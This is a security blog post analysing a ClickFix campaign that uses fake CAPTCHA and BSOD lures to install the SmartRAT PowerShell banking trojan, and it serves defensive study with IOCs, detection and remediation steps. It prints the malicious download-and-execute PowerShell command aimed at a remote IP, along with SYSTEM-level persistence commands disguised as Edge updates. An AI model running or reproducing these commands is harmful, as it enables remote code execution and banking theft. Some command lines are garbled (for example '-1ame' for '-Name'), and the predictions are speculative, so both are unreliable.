Hackers Weaponize AI-Generated Fake Cloudflare CAPTCHA and BSOD Lures to Deploy SmartRAT Banking Malware + Video

By /

Listen to this Post

Featured Image

Introduction:

In March 2026, Zscaler ThreatLabz uncovered a sophisticated malware campaign that combines AI-generated websites, psychological manipulation, and PowerShell-based malware to target customers of a major Brazilian bank. The campaign employs a deceptive technique known as ClickFix, where victims are presented with a fake Cloudflare CAPTCHA followed by a simulated Blue Screen of Death (BSOD)—all designed to pressure users into manually executing malicious PowerShell commands. What makes this attack particularly concerning is the use of AI-powered website builders to rapidly generate convincing lures at scale, lowering the barrier to entry for cybercriminals while preserving sophisticated post-exploitation capabilities.

Learning Objectives:

  • Understand the complete ClickFix attack chain and how AI-generated content enables scalable social engineering
  • Analyze SmartRAT’s technical capabilities, including encrypted C2 communications, persistence mechanisms, and financial data theft techniques
  • Learn practical detection, prevention, and incident response strategies to defend against PowerShell-based RATs and social engineering lures
  1. The ClickFix Attack Chain: From Fake CAPTCHA to Full System Compromise

The attack begins when a victim visits a typosquatting domain such as cartaobb[.]com, which impersonates the legitimate Brazilian bank domain cartaobrb[.]com[.]br. The fraudulent webpage, likely generated using AI-powered website creation tools, presents a fake Cloudflare CAPTCHA that mimics a legitimate security check.

Step-by-step breakdown of the infection chain:

  1. Initial Lure: The victim lands on the typosquatted page advertising a credit card application, where a fake Cloudflare CAPTCHA prompt is displayed.

  2. Anti-Inspection Evasion: The webpage employs aggressive anti-analysis measures. The script disables keyboard shortcuts for opening DevTools (F12, Ctrl+Shift+I, Ctrl+U) by intercepting keydown events and invoking preventDefault(). Additionally, every 3 seconds, the script logs a crafted Image object whose getter triggers console.clear(), repeatedly wiping the browser console while DevTools is open.

  3. Clipboard Injection: When the victim clicks the fake CAPTCHA, malicious JavaScript immediately copies a PowerShell command to the victim’s clipboard.

  4. Fullscreen Lockdown and Fake BSOD: The browser is forced into fullscreen mode, and a fake Blue Screen of Death “system recovery” page is displayed. A lockdown routine restricts keyboard input while temporarily allowing only the specific key combinations needed to execute the malicious flow.

  5. Social Engineering Payoff: The fake BSOD screen explicitly instructs the trapped user to press a specific key combination (Windows Key + R) and paste the copied command into the Run dialog.

  6. Malware Execution: The pasted PowerShell command retrieves a stealth dropper script from a remote server, which hides its console window, downloads an encrypted payload, and executes SmartRAT.

Example of the malicious PowerShell command structure (defanged for analysis):

 The clipboard-injected command typically resembles:
powershell -ex bypass -w hidden -c "iex (New-Object Net.WebClient).DownloadString('hxxp://64.95.13.238/st.txt')"

The initial st.txt dropper fetches a second file, payload.php, containing an AES-encrypted PowerShell script that unpacks and executes the final SmartRAT payload.

  1. SmartRAT: Technical Analysis of the PowerShell-Based Banking Trojan

SmartRAT is a fully featured remote access trojan written entirely in PowerShell, designed for remote access and financial data theft. Its capabilities make it one of the more dangerous banking RATs observed in recent campaigns.

Core Capabilities:

  • Encrypted C2 Communications: SmartRAT uses encrypted channels to communicate with its command-and-control infrastructure, making network detection more challenging.

  • Remote Control: Full remote control over the compromised system, including screen monitoring, keyboard and mouse control.

  • Credential Theft: Keylogging capabilities and the ability to display full-screen fake bank-branded overlay forms that steal passwords and sensitive data directly from victims.

  • Financial Monitoring: The malware actively monitors active windows for keywords related to popular banks, credit unions, and cryptocurrency platforms such as Binance and MercadoPago. When a target application is detected, it immediately alerts the threat actor.

  • QR Code Interception: SmartRAT can intercept QR codes on banking pages to redirect payment transactions.

  • Persistence Mechanisms: To survive system reboots, SmartRAT creates a scheduled task or installs a Windows service with elevated system privileges.

Persistence Analysis:

 SmartRAT establishes persistence through:
 1. Scheduled Task (disguised as Microsoft Edge update)
schtasks /create /tn "MicrosoftEdgeUpdateTask" /tr "powershell -w hidden -c <encoded_command>" /sc onlogon /ru SYSTEM

<ol>
<li>Windows Service (SYSTEM-level access)
sc create "EdgeUpdateService" binPath= "powershell -w hidden -c <encoded_command>" start= auto</p></li>
<li><p>Registry-based startup entry
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EdgeUpdate" /t REG_SZ /d "powershell -w hidden -c <encoded_command>"

The malware disguises its files and scheduled tasks under Microsoft Edge update names, blending in with legitimate Windows processes. It attempts to escalate privileges by prompting for UAC approval; if granted, it installs itself as a Windows service under SYSTEM-level access. Even if the user denies UAC, SmartRAT persists through a hidden PowerShell process and a registry-based startup entry.

3. AI-Generated Infrastructure and the Flawed C2 Panel

A particularly striking aspect of this campaign is that the attackers used AI tools not only to generate the phishing webpage but also to build their command-and-control panel. The C2 panel, branded as “MyGood PRO,” provides operators with a live dashboard of connected victims along with real-time command capabilities.

Critical Security Flaw Discovered:

Zscaler ThreatLabz discovered a fundamental flaw in the AI-generated C2 panel: the login system was entirely client-side. Anyone could bypass authentication by simply setting two values in the browser’s local storage. This basic security gap points to code written without proper review—a likely result of rushed, AI-assisted development where security considerations were overlooked.

C2 Panel Capabilities:

  • Live dashboard of infected victims with real-time status updates
  • Screen streaming to monitor victim activity
  • QR code swapping on banking pages to redirect payment transactions
  • Injection of fake bank verification forms to steal credentials

4. Detection and Prevention Strategies

Indicators of Compromise (IOCs):

| Indicator | Description |

|–|-|

| cartaobb[.]com | Fraudulent typosquatting domain |

| crefisa[.]online | Fraudulent domain |

| vfsgloball[.]net | Fraudulent domain |

| 64.95.13.238 | Remote server hosting st.txt dropper |

| st.txt | Initial dropper script |

| payload.php | AES-encrypted PowerShell payload |

Detection Commands:

Windows – Check for Suspicious Scheduled Tasks:

 List all scheduled tasks with PowerShell-based commands
Get-ScheduledTask | Where-Object {$_.Actions -like "powershell"} | Format-Table TaskName, State, Actions

Check for tasks disguised as Microsoft Edge updates
schtasks /query /fo LIST /v | findstr /i "edge update"

Windows – Identify Suspicious Services:

 List services with PowerShell execution paths
Get-Service | Where-Object {$<em>.DisplayName -like "edge" -or $</em>.DisplayName -like "update"} | Format-Table Name, DisplayName, Status

Check for services with suspicious binary paths
wmic service get name, pathname, startmode | findstr /i "powershell"

Windows – Registry Persistence Checks:

 Check Run registry keys for suspicious entries
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run

Check for Edge-related persistence
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EdgeUpdate"

Linux – Network Traffic Analysis (for C2 detection):

 Monitor outbound connections to suspicious IPs
sudo tcpdump -i any host 64.95.13.238

Check for unusual outbound PowerShell-related traffic
sudo netstat -tunap | grep -i powershell

Prevention Measures:

  1. Application Control: Use Windows Defender Application Control or AppLocker to restrict the execution of PowerShell scripts from user-writeable locations.

  2. PowerShell Logging: Enable PowerShell script block logging and transcription to capture malicious command execution:

 Enable PowerShell logging via Group Policy or local policy
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -1ame "EnableScriptBlockLogging" -Value 1

Enable transcription
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription" -1ame "EnableTranscripting" -Value 1
  1. Web Filtering: Block known malicious domains (cartaobb[.]com, crefisa[.]online, vfsgloball[.]net) at the network level.

  2. User Awareness: Train employees to recognize fake CAPTCHA prompts and never paste clipboard contents into the Run dialog unless absolutely certain of the source.

  3. Endpoint Detection and Response (EDR): Deploy EDR solutions capable of detecting PowerShell-based attacks and suspicious process creation patterns.

5. Incident Response Procedures for SmartRAT Infections

If a SmartRAT infection is suspected, follow these containment and remediation steps:

Immediate Containment:

  1. Disconnect the affected system from all networks (Ethernet, Wi-Fi, and Bluetooth) to prevent further C2 communication and data exfiltration.

2. Identify and terminate malicious processes:

 List all PowerShell processes
Get-Process -1ame powershell -IncludeUserName

Terminate suspicious PowerShell processes
Stop-Process -Id <PID> -Force

Eradication:

1. Remove malicious scheduled tasks:

 Delete tasks associated with the infection
schtasks /delete /tn "MicrosoftEdgeUpdateTask" /f
schtasks /delete /tn "EdgeUpdateTask" /f

2. Delete malicious Windows services:

 Stop and delete suspicious services
sc stop "EdgeUpdateService"
sc delete "EdgeUpdateService"

3. Remove registry persistence entries:

 Delete malicious Run entries
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "EdgeUpdate" /f
  1. Delete malware files: Remove any files associated with SmartRAT from `C:\ProgramData\SmartPrint\` or other suspicious directories.

  2. Full system scan: Run a complete antivirus and anti-malware scan using updated definitions.

Recovery:

  1. Reset compromised credentials: Any passwords entered after infection should be considered compromised and changed immediately.

  2. Monitor for indicators of persistence: Continue monitoring scheduled tasks, services, and registry entries for recreation attempts.

  3. Review and rotate API keys and tokens: If the compromised system had access to any APIs or cloud services, rotate all associated credentials.

6. Windows and Linux Commands for Forensic Investigation

Windows – Comprehensive Malware Hunting:

 Search for PowerShell scripts in suspicious locations
Get-ChildItem -Path C:\ -Recurse -Filter .ps1 -ErrorAction SilentlyContinue | Where-Object {$_.DirectoryName -match "Temp|Public|Users"}

Check for encoded PowerShell commands in event logs
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" | Where-Object {$<em>.Message -match "-e" -or $</em>.Message -match "EncodedCommand"}

Examine scheduled tasks with detailed output
schtasks /query /fo CSV /v | ConvertFrom-CSV | Export-Csv -Path scheduled_tasks_audit.csv -1oTypeInformation

Check network connections for suspicious outbound traffic
netstat -ano | findstr ESTABLISHED

Search for recently created files in temp directories
Get-ChildItem -Path C:\Users\AppData\Local\Temp -Recurse -File | Where-Object {$_.CreationTime -gt (Get-Date).AddHours(-24)}

Linux – Network and Process Analysis (if Linux-based C2 infrastructure is involved):

 Analyze network connections
sudo ss -tunap | grep ESTAB

Check for suspicious cron jobs
crontab -l
sudo crontab -l

Search for suspicious files modified in the last 24 hours
find / -type f -mtime -1 2>/dev/null | grep -v -E "/proc|/sys|/dev"

Check for unusual systemd services
systemctl list-units --type=service --all | grep -i -E "edge|update|smart"

What Undercode Say:

  • Social Engineering Meets AI at Scale: This campaign represents a significant evolution in threat actor capabilities. The use of AI-generated websites and C2 panels demonstrates how low-cost AI tooling reduces development friction for attackers while preserving sophisticated post-exploitation capabilities. We’re entering an era where cybercriminals can rapidly spin up convincing, targeted attacks without deep technical expertise.

  • The ClickFix Technique Is Here to Stay: The combination of fake CAPTCHA prompts and simulated system crashes is psychologically devastating. By creating a sense of urgency and panic, attackers bypass rational decision-making and coerce victims into executing malicious code themselves. This technique has been observed across multiple campaigns targeting different sectors, suggesting it will become a standard tool in the threat actor’s arsenal.

  • PowerShell Remains a Primary Attack Vector: Despite increased security awareness, PowerShell continues to be heavily abused in malware campaigns. Its flexibility, extensive system access, and ability to run in memory make it an ideal tool for attackers. Organizations must implement robust PowerShell logging and restriction policies as a fundamental security control.

  • AI-Generated Code Introduces New Vulnerabilities: The discovery of a critical authentication bypass in the C2 panel—caused by client-side-only login validation—highlights a dangerous irony: while AI enables faster development, it also introduces security flaws that may go unnoticed without proper code review. This creates opportunities for defenders and even rival threat actors to exploit these weaknesses.

  • Defense Requires Layered Security: No single control can prevent these attacks. Effective defense requires a combination of user awareness training, application control policies, PowerShell logging, network filtering, and robust endpoint detection. Organizations must treat social engineering as a primary threat vector, not just a technical problem.

Prediction:

  • +1 AI-powered attack generation will become increasingly mainstream in the cybercriminal ecosystem. As AI tools become more accessible and sophisticated, we can expect a surge in highly targeted, personalized phishing campaigns that are difficult to distinguish from legitimate communications. Defenders must invest in AI-based detection systems to counter this trend.

  • -1 The ClickFix technique will be rapidly adopted by other threat actors and adapted for different sectors. We’ve already seen variations targeting the hospitality industry, and it’s only a matter of time before similar campaigns target healthcare, government, and other critical infrastructure sectors. Organizations across all industries must prepare for this threat.

  • +1 The authentication flaw discovered in SmartRAT’s C2 panel presents a unique opportunity for threat intelligence sharing and potential disruption of the campaign. Security researchers and law enforcement may be able to leverage this vulnerability to map the attacker’s infrastructure or even take down C2 servers.

  • -1 As PowerShell-based attacks become more prevalent, we will likely see an increase in fileless malware and living-off-the-land techniques that evade traditional signature-based detection. Organizations will need to shift toward behavioral detection and zero-trust architectures to stay ahead.

  • +1 This campaign highlights the growing importance of PowerShell security. We can expect Microsoft and other vendors to introduce additional security controls and logging capabilities for PowerShell, making it harder for attackers to abuse this powerful tool. Organizations should proactively implement these controls rather than waiting for breaches to force their hand.

▶️ Related Video (80% Match):

https://www.youtube.com/watch?v=1tB5USD004w

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Varshu25 Hackers – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: